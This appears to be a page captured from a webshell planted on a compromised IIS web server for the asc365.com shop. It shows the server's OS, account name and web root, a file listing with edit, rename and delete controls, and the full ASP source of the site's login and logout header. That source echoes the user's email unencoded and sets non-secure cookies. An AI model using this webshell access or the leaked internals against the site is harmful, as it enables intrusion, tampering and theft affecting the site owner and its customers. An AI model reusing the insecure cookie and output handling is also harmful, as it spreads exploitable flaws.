Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title></title> </head> <body style="background-color:#FFFFFF"> <% '-----����Ա�˳���¼ ID = request.QueryString("ID") if ID="LogOut" then Response.Cookies("WebCookieUser")="" Response.Cookies("WebCookiePass")="" Response.Cookies("WebCookieRealName")="" Response.Cookies("WebCookieLevel")="" Response.Cookies("UserId")="" response.Cookies("Userid").Domain="asc365.com" response.Cookies("Userid").Secure=False Response.Cookies("UserEmail")="" response.Cookies("UserEmail").Domain="asc365.com" response.Cookies("UserEmail").Secure=False session("UserEmail")="" session("UserId")="" Response.write"<script>alert(""Exit Sucess"");top.location.href='index.asp';</script>" end if %> <table style="width:1000px; height:50px;margin:0 auto;"> <tr> <td width="586" height="50" style="text-align:left;"> <% UserEmail=Session("UserEmail") if len(UserEmail)=0 then UserEmail=request.Cookies("UserEmail") end if if len(UserEmail)>0 then %> <table width="560" border="0" > <tr> <td width="282"><p style="font:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#666666">Hello,<%=UserEmail%></p></td> <td width="268" align="left"><a href="<%=Thispage&"?ID=LogOut"%>"> <p style="font:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#666666">Sign Out</p> </a></td> </tr> </table> <% else %> <font style="font-weight:lighter"><a href="Register.asp">Sign in</a> or <a href="Register.asp" >register</a></font> <% end if %> </div></td> <td width="124"><a href="myaccount.asp"> <p style=" font-family:Verdana, Arial, Helvetica, sans-serif ;font-size:14px; color:#666666">My Asc365</p> </a></td> <td width="152"><a href="myshippingcart.asp" target="_blank"> <p style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#666666">My shopping cart</p> </a></td> </tr> </table> </body> </html>